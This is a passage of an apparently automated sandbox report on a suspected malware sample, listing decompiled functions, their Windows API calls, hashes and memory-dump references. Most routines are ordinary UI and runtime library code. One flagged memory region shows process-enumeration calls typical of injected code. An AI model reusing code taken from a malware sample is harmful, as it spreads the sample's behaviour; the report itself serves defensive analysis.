                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Similarity
                  • API ID: Time$File$ErrorLast$Exception@8H_prolog3LocalSystemThrow
                  • String ID:
                  • API String ID: 821146650-0
                  • Opcode ID: 01c99723038ad47921689631886dd98cb9011c0b6efba3e1e3db2276f9bfe786
                  • Instruction ID: 7f314973e1ded6b7ef5a961ee441c8429dab474b5b76dc5320eba2664e5a75b7
                  • Opcode Fuzzy Hash: 01c99723038ad47921689631886dd98cb9011c0b6efba3e1e3db2276f9bfe786
                  • Instruction Fuzzy Hash: 6A111E25F10229A7DF10BBF79C055AE77BDAF44718F80506BA901A7351EA788A1087DD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0040918B(void* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
                  				signed int _v8;
                  				char _v268;
                  				signed int _v272;
                  				int _v276;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t18;
                  				void* _t31;
                  				intOrPtr _t32;
                  				intOrPtr _t38;
                  				void* _t39;
                  				intOrPtr* _t40;
                  				intOrPtr _t41;
                  				intOrPtr _t44;
                  				signed int _t48;
                  				void* _t51;
                  
                  				_t51 = __eflags;
                  				_t38 = __edx;
                  				_t33 = __ecx;
                  				_t46 = _t48;
                  				_t18 =  *0x463404; // 0x18eab29f
                  				_v8 = _t18 ^ _t48;
                  				_t31 = _a4;
                  				_push(_t39);
                  				E0040EE3C(_t31, _t33, SetActiveWindow( *(__ecx + 0x20)));
                  				_v276 = DragQueryFileA(_t31, 0xffffffff, 0, 0);
                  				_t24 = E0041F363(_t31, _t39, DragQueryFileA, _t51);
                  				_v272 = _v272 & 0x00000000;
                  				_t40 =  *((intOrPtr*)(_t24 + 4));
                  				if(_v276 > 0) {
                  					do {
                  						DragQueryFileA(_t31, _v272,  &_v268, 0x104);
                  						 *((intOrPtr*)( *_t40 + 0x88))( &_v268);
                  						_v272 = _v272 + 1;
                  						_t24 = _v272;
                  					} while (_v272 < _v276);
                  				}
                  				DragFinish(_t31);
                  				_pop(_t41);
                  				_pop(_t44);
                  				_pop(_t32);
                  				return E00430650(_t24, _t32, _v8 ^ _t46, _t38, _t41, _t44);
                  			}






















                  APIs
                  • SetActiveWindow.USER32(?), ref: 004091AB
                  • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 004091C4
                  • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004091F7
                  • DragFinish.SHELL32(?), ref: 0040921F
                  Similarity
                  • API ID: Drag$FileQuery$ActiveFinishWindow
                  • String ID:
                  • API String ID: 892977027-0
                  • Opcode ID: 3d032a88417c343d42d2e43863a739bd58ef8c9bb5453b8cbdf58d110f34be10
                  • Instruction ID: 0dbc43127ea2ce8ae02b0a4d7d8f7e2c132127b2c2e01dcd9ff7c6f5005a244b
                  • Opcode Fuzzy Hash: 3d032a88417c343d42d2e43863a739bd58ef8c9bb5453b8cbdf58d110f34be10
                  • Instruction Fuzzy Hash: E011A375A00118ABCB109F65CC45FDDB7B8FB59314F1045EAE559A3291CBB4AE808F94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00428E59(void* __ecx, void* __edx, void* __eflags) {
                  				void* _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* _t9;
                  				void* _t11;
                  				int _t13;
                  				void* _t23;
                  				void* _t29;
                  				intOrPtr* _t31;
                  				void* _t33;
                  				void* _t35;
                  
                  				_t29 = __edx;
                  				_push(__ecx);
                  				_t23 = __ecx;
                  				_t9 = E00404461(__eflags, 0x10);
                  				_t37 = _t9;
                  				if(_t9 == 0) {
                  					_t31 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t31 = E00428E3A(_t9, _t37);
                  				}
                  				_t11 = GetCurrentProcess();
                  				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
                  				_t35 = _t33;
                  				if(_t13 == 0) {
                  					if(_t31 != 0) {
                  						 *((intOrPtr*)( *_t31 + 4))(1);
                  					}
                  					E0042EAA8(_t23, _t29, _t31, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                  				}
                  				 *((intOrPtr*)(_t31 + 4)) = _v8;
                  				 *((intOrPtr*)(_t31 + 8)) =  *((intOrPtr*)(_t23 + 8));
                  				return _t31;
                  			}
















                  APIs
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00428E8D
                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00428E93
                  • DuplicateHandle.KERNEL32(00000000), ref: 00428E96
                  • GetLastError.KERNEL32(?), ref: 00428EB1
                  Similarity
                  • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                  • String ID:
                  • API String ID: 3704204646-0
                  • Opcode ID: 9da527475a3e1387b3d6d09f6d7e226383096d634adb75a74a0ecf538e676cf5
                  • Instruction ID: af5f4325da4a8d9e4f0321186dcae96371d0d4a3212ff4cde42e699575839eef
                  • Opcode Fuzzy Hash: 9da527475a3e1387b3d6d09f6d7e226383096d634adb75a74a0ecf538e676cf5
                  • Instruction Fuzzy Hash: 4201BC35700210ABDB10ABA6EC49F1E7BACFBC4750F55846AB904CB291DB74DC018B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0042EDD4(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
                  				struct tagPOINT _v12;
                  				void* __edi;
                  				struct tagPOINT* _t8;
                  				struct HWND__* _t9;
                  				int _t14;
                  				long _t19;
                  				void* _t20;
                  				struct HWND__* _t22;
                  				struct HWND__* _t23;
                  				struct HWND__* _t26;
                  
                  				_t20 = __edx;
                  				_t8 = _a8;
                  				_v12.x = _t8->x;
                  				_t19 = _t8->y;
                  				_push(_t19);
                  				_v12.y = _t19;
                  				_t9 = WindowFromPoint( *_t8);
                  				_t26 = _t9;
                  				if(_t26 != 0) {
                  					_t22 = GetParent(_t26);
                  					if(_t22 == 0 || E0041FDA4(__ebx, _t20, _t22, _t22, 2) == 0) {
                  						ScreenToClient(_t26,  &_v12);
                  						_t23 = E0041FE4A(_t26, _v12.x, _v12.y);
                  						if(_t23 == 0) {
                  							L6:
                  							_t9 = _t26;
                  						} else {
                  							_t14 = IsWindowEnabled(_t23);
                  							_t9 = _t23;
                  							if(_t14 != 0) {
                  								goto L6;
                  							}
                  						}
                  					} else {
                  						_t9 = _t22;
                  					}
                  				}
                  				return _t9;
                  			}














                  APIs
                  • WindowFromPoint.USER32(?,?), ref: 0042EDED
                  • GetParent.USER32(00000000), ref: 0042EDFB
                  • ScreenToClient.USER32 ref: 0042EE1C
                  • IsWindowEnabled.USER32(00000000), ref: 0042EE35
                  Similarity
                  • API ID: Window$ClientEnabledFromParentPointScreen
                  • String ID:
                  • API String ID: 1871804413-0
                  • Opcode ID: 09ae46004f4857c8d73721675ea0760a74aa4fdc1be718844f7737e07083e2e8
                  • Instruction ID: b4a697f47c67ab9837afbcedfbb94ed47278685bea9992d24b7a779d1c0570bb
                  • Opcode Fuzzy Hash: 09ae46004f4857c8d73721675ea0760a74aa4fdc1be718844f7737e07083e2e8
                  • Instruction Fuzzy Hash: 00018436700524BF87129B9AEC05DAF7BB9EFCA700B59002AF905D7310EB39CD019769
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404697(void* __ecx, struct HMENU__* _a4) {
                  				int _v8;
                  				struct HMENU__* _v12;
                  				struct HMENU__* _t8;
                  				int _t9;
                  				int _t11;
                  				int _t12;
                  				int _t16;
                  				struct HMENU__* _t19;
                  
                  				if(_a4 != 0) {
                  					_t8 = GetMenuItemCount(_a4);
                  					while(_t8 != 0) {
                  						_t9 = _t8 - 1;
                  						_v12 = _t9;
                  						_t19 = GetSubMenu(_a4, _t9);
                  						if(_t19 == 0) {
                  							L8:
                  							_t8 = _v12;
                  							continue;
                  						}
                  						_t11 = GetMenuItemCount(_t19);
                  						_t16 = 0;
                  						_v8 = _t11;
                  						if(_t11 <= 0) {
                  							goto L8;
                  						} else {
                  							goto L5;
                  						}
                  						while(1) {
                  							L5:
                  							_t12 = GetMenuItemID(_t19, _t16);
                  							if(_t12 >= 0xe130 && _t12 <= 0xe13f) {
                  								break;
                  							}
                  							_t16 = _t16 + 1;
                  							if(_t16 < _v8) {
                  								continue;
                  							}
                  							goto L8;
                  						}
                  						_t8 = _t19;
                  						break;
                  					}
                  					return _t8;
                  				}
                  				return 0;
                  			}












                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CountItemMenu
                  • String ID:
                  • API String ID: 1409047151-0
                  • Opcode ID: 86433844df9c92315779f0bf3a59f81ac8ab8415fea35b458be3f3d47a692d0d
                  • Instruction ID: 8276e2b91934d31df3356f8f8f605792c0e2d79c3701d85367bebcb7180b13e2
                  • Opcode Fuzzy Hash: 86433844df9c92315779f0bf3a59f81ac8ab8415fea35b458be3f3d47a692d0d
                  • Instruction Fuzzy Hash: A001F2B5900109BFDB004B65CC8486F7AA9EBD3344F610837EA01F3290FA7ECD41AA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0043E6D3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				intOrPtr _t25;
                  				void* _t26;
                  				void* _t28;
                  
                  				_t25 = _a16;
                  				if(_t25 == 0x65 || _t25 == 0x45) {
                  					_t26 = E0043DFC4(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                  					goto L9;
                  				} else {
                  					_t34 = _t25 - 0x66;
                  					if(_t25 != 0x66) {
                  						__eflags = _t25 - 0x61;
                  						if(_t25 == 0x61) {
                  							L7:
                  							_t26 = E0043E0B4(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                  						} else {
                  							__eflags = _t25 - 0x41;
                  							if(__eflags == 0) {
                  								goto L7;
                  							} else {
                  								_t26 = E0043E5D9(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                  							}
                  						}
                  						L9:
                  						return _t26;
                  					} else {
                  						return E0043E51E(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                  					}
                  				}
                  			}







                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction ID: 599c970f0d7140b4d8948086046bd40c7f1d60777e1d6830c4359a05df86eb3f
                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction Fuzzy Hash: 4F11803240114EBBCF265EC6CC41CEE3F22BB0C394F189416FA18591B1D73AD9B2AB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E0040F188(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t9;
                  				struct HWND__* _t10;
                  				void* _t14;
                  				void* _t15;
                  				struct HWND__* _t16;
                  				struct HWND__* _t17;
                  
                  				_t14 = __ecx;
                  				_t13 = __ebx;
                  				_t9 = GetDlgItem(_a4, _a8);
                  				_t15 = GetTopWindow;
                  				_t16 = _t9;
                  				if(_t16 == 0) {
                  					L6:
                  					_t10 = GetTopWindow(_a4);
                  					while(1) {
                  						_t17 = _t10;
                  						__eflags = _t17;
                  						if(_t17 == 0) {
                  							goto L10;
                  						}
                  						_t10 = E0040F188(_t13, _t14, _t17, _a8, _a12);
                  						__eflags = _t10;
                  						if(_t10 == 0) {
                  							_t10 = GetWindow(_t17, 2);
                  							continue;
                  						}
                  						goto L10;
                  					}
                  				} else {
                  					if(GetTopWindow(_t16) == 0) {
                  						L3:
                  						_push(_t16);
                  						if(_a12 == 0) {
                  							return E0040EE3C(_t13, _t14);
                  						}
                  						_t10 = E0040EE68(_t14, _t15, _t16, __eflags);
                  						__eflags = _t10;
                  						if(_t10 == 0) {
                  							goto L6;
                  						}
                  					} else {
                  						_t10 = E0040F188(__ebx, _t14, _t16, _a8, _a12);
                  						if(_t10 == 0) {
                  							goto L3;
                  						}
                  					}
                  				}
                  				L10:
                  				return _t10;
                  			}












                  APIs
                  • GetDlgItem.USER32 ref: 0040F195
                  • GetTopWindow.USER32(00000000), ref: 0040F1A8
                    • Part of subcall function 0040F188: GetWindow.USER32(00000000,00000002), ref: 0040F1EF
                  • GetTopWindow.USER32(?), ref: 0040F1D8
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Item
                  • String ID:
                  • API String ID: 369458955-0
                  • Opcode ID: 68f76c8b40c0a4f109fccf0564f6876d2fd39e1f2526f7d48fb36ded73cfd4b3
                  • Instruction ID: e83c7ebf38d33043e2068e8d2e03b0507baf608e2471e865396bf5c0c4cbf0b1
                  • Opcode Fuzzy Hash: 68f76c8b40c0a4f109fccf0564f6876d2fd39e1f2526f7d48fb36ded73cfd4b3
                  • Instruction Fuzzy Hash: 7D01843600151AF7CB326F62CC04E9F3A25AF853A4F154436FC04B9690EB39CD19A6ED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E00404E93(intOrPtr __ecx) {
                  				intOrPtr _v8;
                  				long _v12;
                  				struct HWND__* _t21;
                  				intOrPtr* _t30;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_v8 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x20)) != 0) {
                  					_t30 = E0040474E(__ecx);
                  					_t21 =  *(_t30 + 0x20);
                  					_v12 = SetWindowLongA(_t21, 0xfffffff0, GetWindowLongA(_t21, 0xfffffff0) & 0xffff7fff);
                  					E00404A2E(_v8);
                  					if(IsWindow(_t21) != 0) {
                  						SetWindowLongA(_t21, 0xfffffff0, _v12);
                  						 *((intOrPtr*)( *_t30 + 0x178))(1);
                  					}
                  					return 1;
                  				} else {
                  					return 0;
                  				}
                  			}








                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: 1ae47132c50d68974ba8675a73dd19e1812ace48a7251e8b5cf853d1bf8cc61d
                  • Instruction ID: 4249becefff12f9aa532041eef5b774ba33af07bc398f959ababbc606d27a936
                  • Opcode Fuzzy Hash: 1ae47132c50d68974ba8675a73dd19e1812ace48a7251e8b5cf853d1bf8cc61d
                  • Instruction Fuzzy Hash: E80186B5204214BBDB009B75CC45E9B76ACFF85335F150769F522E32D1DB74D8018A68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E004122AD(intOrPtr __ecx, CHAR* _a4) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t7;
                  				struct HRSRC__* _t10;
                  				void* _t13;
                  				void* _t18;
                  				void* _t20;
                  				void* _t21;
                  				struct HINSTANCE__* _t23;
                  
                  				_push(__ecx);
                  				_push(_t20);
                  				_t13 = 0;
                  				_t18 = 0;
                  				_v8 = __ecx;
                  				_t24 = _a4;
                  				if(_a4 == 0) {
                  					L4:
                  					_t21 = E00411E27(_v8, _t18, _t18);
                  					if(_t18 != 0 && _t13 != 0) {
                  						FreeResource(_t13);
                  					}
                  					_t7 = _t21;
                  				} else {
                  					_t23 =  *(E0041F363(0, 0, _t20, _t24) + 0xc);
                  					_t10 = FindResourceA(_t23, _a4, 0xf0);
                  					if(_t10 == 0) {
                  						goto L4;
                  					} else {
                  						_t7 = LoadResource(_t23, _t10);
                  						_t13 = _t7;
                  						if(_t13 != 0) {
                  							_t18 = LockResource(_t13);
                  							goto L4;
                  						}
                  					}
                  				}
                  				return _t7;
                  			}
















                  APIs
                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004122D3
                  • LoadResource.KERNEL32(?,00000000), ref: 004122DF
                  • LockResource.KERNEL32(00000000), ref: 004122EC
                  • FreeResource.KERNEL32(00000000), ref: 00412308
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 332a509225835964b8b30f771263e14b9896a6b914ce92aa81eca866c340bb78
                  • Instruction ID: eb341e2990d3aa9b8187f0255b35ca994ee6d51934ff18c2a607a87465d7b55a
                  • Opcode Fuzzy Hash: 332a509225835964b8b30f771263e14b9896a6b914ce92aa81eca866c340bb78
                  • Instruction Fuzzy Hash: EFF0AF373002066B97115FE79D84AAFBAACEB82660704407ABE05E3201DEB8DD51C668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040D2F2(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
                  				long _v12;
                  				void _v16;
                  				intOrPtr _t12;
                  				long _t16;
                  				void* _t21;
                  				void* _t22;
                  				void* _t23;
                  
                  				if(_a4 == 0 || _a16 == 0) {
                  					L10:
                  					return 0;
                  				} else {
                  					_t12 = _a12;
                  					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041FDA4(_t21, _t22, _t23, _a8, _t12) == 0) {
                  						goto L10;
                  					} else {
                  						GetObjectA(_a16, 0xc,  &_v16);
                  						SetBkColor(_a4, _v12);
                  						_t16 = _a20;
                  						if(_t16 == 0xffffffff) {
                  							_t16 = GetSysColor(8);
                  						}
                  						SetTextColor(_a4, _t16);
                  						return 1;
                  					}
                  				}
                  			}











                  APIs
                  • GetObjectA.GDI32(00000000,0000000C,?), ref: 0040D332
                  • SetBkColor.GDI32(00000000,00000000), ref: 0040D33E
                  • GetSysColor.USER32(00000008), ref: 0040D34E
                  • SetTextColor.GDI32(00000000,?), ref: 0040D358
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$ObjectText
                  • String ID:
                  • API String ID: 829078354-0
                  • Opcode ID: 0917485d60be57fba84de33db906499c11b2f6a15f302fa225eb6ba83a7df9d6
                  • Instruction ID: bff7330aa8aa4276d550d16e5f7a19a6b3b1f139b7051842c5f6b980f89d7a30
                  • Opcode Fuzzy Hash: 0917485d60be57fba84de33db906499c11b2f6a15f302fa225eb6ba83a7df9d6
                  • Instruction Fuzzy Hash: 27014F35900108ABDF215FB5DC89AAF3BA5FB45314F188132FD51E22E0C734CC99CA5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 023E1954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 023E1973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 023E1983
                  • CloseHandle.KERNEL32(00000000), ref: 023E199F
                    • Part of subcall function 023E2255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,023E199A,0000022C), ref: 023E2273
                    • Part of subcall function 023E2255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,023E199A,0000022C), ref: 023E2284
                    • Part of subcall function 023E2255: lstrcpyW.KERNEL32(00000004,?), ref: 023E22B6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: cbcf0a21b3b072b40498ab5d716a8c0b949bd57f6c332687393129b697b02eeb
                  • Instruction ID: 5da687969c9d583d8d492b11ab89a99e272f4cdbff6ec3026c77e2879d91c6f9
                  • Opcode Fuzzy Hash: cbcf0a21b3b072b40498ab5d716a8c0b949bd57f6c332687393129b697b02eeb
                  • Instruction Fuzzy Hash: B9F096B19421287ADB206679BC4CBAF777CDB49320F104551FD4AD21C5E7708D198AE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00439212(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                  				signed int _t13;
                  				intOrPtr _t28;
                  				void* _t29;
                  				void* _t30;
                  
                  				_t30 = __eflags;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ebx;
                  				_push(0xc);
                  				_push(0x45e250);
                  				E00431818(__ebx, __edi, __esi);
                  				_t28 = E00436178(__ebx, __edx, __edi, _t30);
                  				_t13 =  *0x463b44; // 0xfffffffe
                  				if(( *(_t28 + 0x70) & _t13) == 0) {
                  					L6:
                  					E0043A0BF(_t22, 0xc);
                  					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                  					_t8 = _t28 + 0x6c; // 0x6c
                  					_t26 =  *0x463c28; // 0x25e10f8
                  					 *((intOrPtr*)(_t29 - 0x1c)) = E004391D4(_t8, _t26);
                  					 *(_t29 - 4) = 0xfffffffe;
                  					E0043927C();
                  				} else {
                  					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                  					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                  						goto L6;
                  					} else {
                  						_t28 =  *((intOrPtr*)(E00436178(_t22, __edx, _t26, _t32) + 0x6c));
                  					}
                  				}
                  				if(_t28 == 0) {
                  					E0043395F(_t25, _t26, 0x20);
                  				}
                  				return E0043185D(_t28);
                  			}








                  APIs
                  • __getptd.LIBCMT ref: 0043921E
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 00439235
                  • __amsg_exit.LIBCMT ref: 00439243
                  • __lock.LIBCMT ref: 00439253
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: 8ff576b7292c7b5a6182514ef2947974fe8b5604b36264260ed5e964655f9010
                  • Instruction ID: db5eb218aed7cb5d1a392201fe744ead5517e1896f3a1eef3f233cd93dbba6bc
                  • Opcode Fuzzy Hash: 8ff576b7292c7b5a6182514ef2947974fe8b5604b36264260ed5e964655f9010
                  • Instruction Fuzzy Hash: 96F06232540701AADB64FF66880274E72A05B0D725F11695FE841672D3CBBC9D009B5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042F2FE(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				void* _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t26;
                  				intOrPtr _t32;
                  				void* _t36;
                  				signed int _t37;
                  				void* _t40;
                  				intOrPtr _t41;
                  				signed int _t42;
                  				void* _t43;
                  
                  				_t39 = __ecx;
                  				_t43 = __ecx;
                  				_t26 = E0041F396(_t36, __ecx, _t40, __ecx, __eflags);
                  				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
                  				if(_a4 != 0) {
                  					_t42 = _a8;
                  					__eflags =  *(__ecx + 0x3c) & _t42;
                  					if(__eflags == 0) {
                  						 *((intOrPtr*)(E0041F363(_t36, _t42, __ecx, __eflags) + 0x38)) = E0042F2EA;
                  						_t24 = _t43 + 0x3c;
                  						 *_t24 =  *(_t43 + 0x3c) | _t42;
                  						__eflags =  *_t24;
                  					}
                  				} else {
                  					_t37 = _a8;
                  					if(( *(__ecx + 0x3c) & _t37) != 0) {
                  						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
                  						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
                  							E0040D89A(_t39, _t49, 1);
                  						}
                  						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
                  							E00431160(_t41,  &_v52, 0, 0x30);
                  							_t32 =  *((intOrPtr*)(_t43 + 0x20));
                  							_v44 = _t32;
                  							_v40 = _t32;
                  							_v52 = 0x2c;
                  							_v48 = 1;
                  							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
                  						}
                  						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
                  					}
                  				}
                  				return 1;
                  			}




















                  APIs
                  • _memset.LIBCMT ref: 0042F33F
                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 0042F36C
                    • Part of subcall function 0040D89A: SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0040D8BF
                    • Part of subcall function 0040D89A: GetKeyState.USER32(00000001), ref: 0040D8D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset
                  • String ID: ,
                  • API String ID: 930327405-3772416878
                  • Opcode ID: 40101904e8074d280dcb2c4609b351c52c5efd4c9a9780d6c8a9c199d9d1a8af
                  • Instruction ID: 7c540c80431b337250ce6ddfd8c45ad52cb60da89bd9e6b3c434e6b46047bbb6
